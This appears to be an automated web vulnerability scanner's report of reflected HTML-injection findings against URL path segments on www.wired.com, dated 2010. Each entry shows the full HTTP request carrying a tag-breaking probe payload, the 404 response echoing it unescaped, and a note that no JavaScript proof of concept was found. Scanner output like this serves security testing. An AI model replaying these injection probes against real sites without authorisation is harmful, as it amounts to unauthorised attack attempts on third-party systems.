GET /scienceb2189"><a>e200d456324/discoveries/news/2006/04/70701 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29312 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:58 GMT Date: Sun, 21 Nov 2010 23:12:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_scienceb2189"><a>e200d456324 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fddd"><a>532487198c1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries3fddd"><a>532487198c1/news/2006/04/70701 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29312 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:23:18 GMT Date: Sun, 21 Nov 2010 23:13:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries3fddd"><a>532487198c1 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ba0f"><a>521893294d7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news6ba0f"><a>521893294d7/2006/04/70701 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29312 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:23:31 GMT Date: Sun, 21 Nov 2010 23:13:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news6ba0f"><a>521893294d7"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e52a"><a>266a89d6056 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science6e52a"><a>266a89d6056/discoveries/news/2007/02/72573 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29312 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:10 GMT Date: Sun, 21 Nov 2010 23:10:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science6e52a"><a>266a89d6056 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33c3b"><a>4f568f221b1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries33c3b"><a>4f568f221b1/news/2007/02/72573 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29312 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:36 GMT Date: Sun, 21 Nov 2010 23:10:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries33c3b"><a>4f568f221b1 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4ce8"><a>7d46a6a8f6b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/newsb4ce8"><a>7d46a6a8f6b/2007/02/72573 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29312 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:47 GMT Date: Sun, 21 Nov 2010 23:10:47 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_newsb4ce8"><a>7d46a6a8f6b"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2186"><a>2b24d914e5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /sciencef2186"><a>2b24d914e5/discoveries/news/2007/02/72649 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29310 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:09 GMT Date: Sun, 21 Nov 2010 23:10:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_sciencef2186"><a>2b24d914e5 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7be0f"><a>71f4beaefd6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries7be0f"><a>71f4beaefd6/news/2007/02/72649 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29312 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:36 GMT Date: Sun, 21 Nov 2010 23:10:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries7be0f"><a>71f4beaefd6 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 423ae"><a>3fe3a67e3bd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news423ae"><a>3fe3a67e3bd/2007/02/72649 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29312 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:47 GMT Date: Sun, 21 Nov 2010 23:10:47 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news423ae"><a>3fe3a67e3bd"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9720"><a>e9f4d710ca3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /scienceb9720"><a>e9f4d710ca3/discoveries/news/2007/03/72723 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29312 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:57 GMT Date: Sun, 21 Nov 2010 23:10:57 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_scienceb9720"><a>e9f4d710ca3 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee3a7"><a>2240bc5bf26 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveriesee3a7"><a>2240bc5bf26/news/2007/03/72723 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29312 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:17 GMT Date: Sun, 21 Nov 2010 23:11:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveriesee3a7"><a>2240bc5bf26 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e7bf"><a>a0ed15676db was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news6e7bf"><a>a0ed15676db/2007/03/72723 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29312 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:29 GMT Date: Sun, 21 Nov 2010 23:11:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news6e7bf"><a>a0ed15676db"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe9ae"><a>f527668027f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /sciencefe9ae"><a>f527668027f/discoveries/news/2007/03/72805 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29312 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:56 GMT Date: Sun, 21 Nov 2010 23:10:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_sciencefe9ae"><a>f527668027f ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e162"><a>7810533295 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries7e162"><a>7810533295/news/2007/03/72805 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29310 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:13 GMT Date: Sun, 21 Nov 2010 23:11:13 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries7e162"><a>7810533295 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8058d"><a>0c1616ffa46 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news8058d"><a>0c1616ffa46/2007/03/72805 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29312 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:23 GMT Date: Sun, 21 Nov 2010 23:11:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news8058d"><a>0c1616ffa46"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2776e"><a>2cf882d2876 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science2776e"><a>2cf882d2876/discoveries/news/2007/04/dayintech_0408 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:19:38 GMT Date: Sun, 21 Nov 2010 23:09:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science2776e"><a>2cf882d2876 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94cdc"><a>0cc65881279 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries94cdc"><a>0cc65881279/news/2007/04/dayintech_0408 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:07 GMT Date: Sun, 21 Nov 2010 23:10:07 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries94cdc"><a>0cc65881279 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7dad"><a>bdaa03d0efd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/newsb7dad"><a>bdaa03d0efd/2007/04/dayintech_0408 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:27 GMT Date: Sun, 21 Nov 2010 23:10:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_newsb7dad"><a>bdaa03d0efd"> ...[SNIP]...
